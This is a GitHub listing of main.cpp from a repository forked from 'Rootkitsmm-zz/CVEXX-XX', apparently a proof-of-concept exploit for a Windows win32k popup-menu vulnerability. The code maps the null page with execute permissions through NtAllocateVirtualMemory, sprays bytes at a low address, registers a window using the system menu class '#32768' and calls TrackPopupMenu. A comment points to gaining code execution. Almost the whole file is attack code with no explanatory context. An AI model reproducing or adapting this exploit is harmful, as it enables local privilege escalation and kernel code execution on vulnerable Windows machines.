forked from Rootkitsmm-zz/CVEXX-XX
-
Notifications
You must be signed in to change notification settings - Fork 0
/
main.cpp
128 lines (100 loc) · 3.53 KB
/
main.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
#include <windows.h>
#include<stdio.h>
#define THIS_CLASSNAME "#32768"
#define ID_ABOUT 2000
#define ID_EXIT 2001
static BOOL g_bModalState = FALSE; //Is messagebox shown
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
typedef
NTSTATUS
(NTAPI *NtAllocateVirtualMemory_t)(
__in HANDLE ProcessHandle,
__inout PVOID *BaseAddress,
__in ULONG_PTR ZeroBits,
__inout PSIZE_T RegionSize,
__in ULONG AllocationType,
__in ULONG Protect
);
void AllocNullPage()
{
HMODULE h;
HANDLE hProc;
PVOID addr;
ULONG size;
NTSTATUS st;
size = 4096;
addr = (PVOID)1;
h = LoadLibraryA("ntdll.dll");
if (!h)
{
exit(1);
}
NtAllocateVirtualMemory_t NtAllocateVirtualMemory;
NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(h, "NtAllocateVirtualMemory");
if (!NtAllocateVirtualMemory)
{
exit(1);
}
hProc = GetCurrentProcess();
if (!hProc)
{
exit(1);
}
st = NtAllocateVirtualMemory(hProc, &addr, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!NT_SUCCESS(st))
{
exit(1);
}
}
BOOL ShowPopupMenu( HWND hWnd, POINT *curpos, int wDefaultItem )
{
//ADD MENU ITEMS.------------------------------------------------------------------
HMENU hPop = CreatePopupMenu();
if ( g_bModalState ) { return FALSE; }
InsertMenu( hPop, 0, MF_BYPOSITION | MF_STRING, ID_ABOUT, "About..." );
InsertMenu( hPop, 1, MF_BYPOSITION | MF_STRING, ID_EXIT , "Exit" );
//CAN DO WITHOUT STUFF.------------------------------------------------------------
SetMenuDefaultItem( hPop, ID_ABOUT, FALSE );
SetFocus ( hWnd );
SendMessage ( hWnd, WM_INITMENUPOPUP, (WPARAM)hPop, 0 );
POINT pt;
if (!curpos)
{
GetCursorPos( &pt );
curpos = &pt;
}
//AllocNullPage();
memset((void*)0x00010003,'\x41',8);
WORD cmd = TrackPopupMenu( hPop, TPM_LEFTALIGN | TPM_RIGHTBUTTON | TPM_RETURNCMD | TPM_NONOTIFY, curpos->x, curpos->y, 0, hWnd, NULL );
// Send message to gain code execution : SendMessage( hWnd, NULL, NULL, 0 );
}
static LRESULT CALLBACK WndProc( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam )
{
return DefWindowProc( hWnd, uMsg, wParam, lParam );
}
int WINAPI WinMain( HINSTANCE hInst, HINSTANCE prev, LPSTR cmdline, int show )
{
WNDCLASSEX wclx;
memset(&wclx, 0, sizeof(wclx));
wclx.cbSize = sizeof( wclx );
wclx.style = 0;
wclx.lpfnWndProc = &WndProc;
wclx.cbClsExtra = 0;
wclx.cbWndExtra = 0;
wclx.hInstance = hInst;
//wclx.hIcon = LoadIcon( hInstance, MAKEINTRESOURCE( IDI_TRAYICON ) );
//wclx.hIconSm = LoadSmallIcon( hInstance, IDI_TRAYICON );
wclx.hCursor = LoadCursor( NULL, IDC_ARROW );
wclx.hbrBackground = (HBRUSH)( COLOR_BTNFACE + 1 );
wclx.lpszMenuName = NULL;
wclx.lpszClassName = THIS_CLASSNAME;
RegisterClassEx( &wclx );
//CREATE WINDOW.----------------------------------------------------------------------------
HWND hWnd = CreateWindow( THIS_CLASSNAME, TEXT("Title"), WS_OVERLAPPEDWINDOW | WS_VISIBLE, 100, 100, 250, 150, NULL, NULL, hInst, NULL );
if ( !hWnd )
{
MessageBox(NULL, "Can't create window!", TEXT("Warning!"), MB_ICONERROR | MB_OK | MB_TOPMOST);
return 1;
}
ShowPopupMenu(hWnd, NULL, -1 );
}